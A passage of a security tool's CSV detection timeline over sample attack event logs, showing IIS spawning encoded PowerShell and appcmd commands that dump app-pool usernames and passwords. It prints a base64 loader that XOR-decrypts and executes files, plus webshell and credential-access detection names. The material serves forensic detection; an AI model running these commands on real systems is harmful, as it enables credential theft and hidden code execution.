Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( 
message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQA
rACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" 
-nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAH
AAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 